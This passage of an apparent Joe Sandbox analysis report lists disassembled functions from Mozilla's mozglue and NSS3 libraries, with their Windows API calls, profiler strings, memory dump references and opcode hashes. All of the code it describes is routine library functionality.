                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F559
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F561
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F577
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F585
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F5A3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C78F56A
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_resume, xrefs: 6C78F239
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C78F499
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C78F3A8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                                                        • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                                                        • Opcode ID: 4d756d7b586fb7cef3ebc328a06e01d6cbfc5f912773102675c2d21d84a2005f
                                                                                                                                                                                                                                                                                        • Instruction ID: d84e05f63a72de7a68e8d34bbf0d1c838d4e2629b7378d504d66db9bbf957e2d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d756d7b586fb7cef3ebc328a06e01d6cbfc5f912773102675c2d21d84a2005f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72F0E9767012029FDB006FB4D84C99A777CEB8675DF000031FB1683702CB35AB008B61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C750E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,6C750DF8), ref: 6C750E82
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C750EA1
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C750EB5
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C750EC5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                                                        • Opcode ID: 9bdd0575eedd66d8ed00accdfdf2d3a5ca26268402743d7c9d094cbc73bcd2aa
                                                                                                                                                                                                                                                                                        • Instruction ID: 81754a95e3896a4f36676f252cd2cf3fb3bc3f065b18d9caa95ee4014aa7a003
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bdd0575eedd66d8ed00accdfdf2d3a5ca26268402743d7c9d094cbc73bcd2aa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B014B74700A878FEF009FB8DA18A4237B9E706718FA00635E90182B40DB34BA349A52
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7805F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C77CFAE,?,?,?,6C7431A7), ref: 6C7805FB
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C77CFAE,?,?,?,6C7431A7), ref: 6C780616
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7431A7), ref: 6C78061C
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7431A7), ref: 6C780627
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _writestrlen
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f98d413895a1663098a662694d9b5a3edbffc8f65790f8c770330660f1b922b
                                                                                                                                                                                                                                                                                        • Instruction ID: 40a5621737ba305f3fd8ad9be7a2a577a1a9f82f00a7eb12bfe9254f1b477853
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f98d413895a1663098a662694d9b5a3edbffc8f65790f8c770330660f1b922b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BE08CE2A010103BF5142256AC8ADBB761CDBC6134F080039FD0D93301E95ABD1A51F7
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7505F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e820b76711ee5f5b477fd2f920a359b53b605ed20deb9eef423a21c2ea8eda71
                                                                                                                                                                                                                                                                                        • Instruction ID: 72c227c76bfc56a19aa46247a16c05f19e73e5412f4a8d6212fd6ed9efc1c6b4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e820b76711ee5f5b477fd2f920a359b53b605ed20deb9eef423a21c2ea8eda71
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23A14BB0A006458FDB14CF29CA94A99FBF1FF48308F44866ED44A97B40EB30BA55CF90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C7A14C5
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7A14E2
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C7A1546
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C7A15BA
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C7A16B4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 036b175dfd67937731d9de0699dd48faf6228dfb2ab6fad31e0d4fe10f741eab
                                                                                                                                                                                                                                                                                        • Instruction ID: 1f82b4ad91e50efabf5cd3a544ee7738662eb2d8a320c7f98c51d4481f93a67a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 036b175dfd67937731d9de0699dd48faf6228dfb2ab6fad31e0d4fe10f741eab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1261DF71A00704DFDB118F65D988BDA77B4BF89308F04962CED8A57611DB31E945CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8CCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C8CDAE2,?), ref: 6C8CC6C2
                                                                                                                                                                                                                                                                                        • PR_Now.NSS3 ref: 6C8CCD35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C3F
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C8CCD54
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929BF0: TlsGetValue.KERNEL32(?,?,?,6C970A75), ref: 6C929C07
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861CCC,00000000,00000000,?,?), ref: 6C8B729F
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8CCD9B
                                                                                                                                                                                                                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C8CCE0B
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C8CCE2C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C
                                                                                                                                                                                                                                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C8CCE40
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C14C0: TlsGetValue.KERNEL32 ref: 6C8C14E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C14C0: EnterCriticalSection.KERNEL32 ref: 6C8C14F5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C14C0: PR_Unlock.NSS3 ref: 6C8C150D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaMark_Util.NSS3(?,6C8CCD93,?), ref: 6C8CCEEE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8CCD93,?), ref: 6C8CCEFC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8CCD93,?), ref: 6C8CCF0B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8CCD93,?), ref: 6C8CCF1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF47
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF67
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C8CCD93,?,?,?,?,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF78
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 47f75c3057241f6bceb179a30a2e57ca301c8b64dcaa8f0bf249a72781e75ebd
                                                                                                                                                                                                                                                                                        • Instruction ID: 3f508c29452512f795988125f2a8e02b8932562e34dacde7bad266f2e0de4de8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47f75c3057241f6bceb179a30a2e57ca301c8b64dcaa8f0bf249a72781e75ebd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451B3B6B001049BE720DF69DE40B9A77F4AF49348F250938D955A7B42EB31E905CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C79DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79DC60
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C79D38A,?), ref: 6C79DC6F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C79D38A,?), ref: 6C79DCC1
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C79D38A,?), ref: 6C79DCE9
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C79D38A,?), ref: 6C79DD05
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C79D38A,?), ref: 6C79DD4A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4103f1b45b9e71466fc356a8f8c506baf6c2278523be85203e11761332cd87f7
                                                                                                                                                                                                                                                                                        • Instruction ID: 25a85c9a7f92c0db1cfffdbc517d250554737787d8f05577dc18b9c6aafee60a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4103f1b45b9e71466fc356a8f8c506baf6c2278523be85203e11761332cd87f7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF419DB5A00206CFCB00CFA9D9849AAB7F9FF89308B154469E905ABB21D771FC10CF90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C77F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C77F480
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C77F555
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7514B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C751248,6C751248,?), ref: 6C7514C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7514B0: memcpy.VCRUNTIME140(?,6C751248,00000000,?,6C751248,?), ref: 6C7514EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C74EEE3
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C77F4FD
                                                                                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C77F523
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                        • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                        • Opcode ID: 729d1029e32e86092fee1bca54196a27931ddc96f25b7bc6a4d17def847c843e
                                                                                                                                                                                                                                                                                        • Instruction ID: 99cb3cb6580b89b9490cf9c5a3501af622d4f7a6bc91c93a9e8a1c0e076a8748
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 729d1029e32e86092fee1bca54196a27931ddc96f25b7bc6a4d17def847c843e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A541BA306047559FD720DF78CA84BABB7F4AF44318F504A2CF59197650EB70E649CBA2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C7A7526
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7A7566
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7A7597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                        • Opcode ID: 99b0cd73042fba093567b1852f8cd75a8ad402912d4386f8c93d020192f3bf0e
                                                                                                                                                                                                                                                                                        • Instruction ID: 62be979992014af70eeb45872ae89989e521c78dad49e78919a82d0ec51a0f24
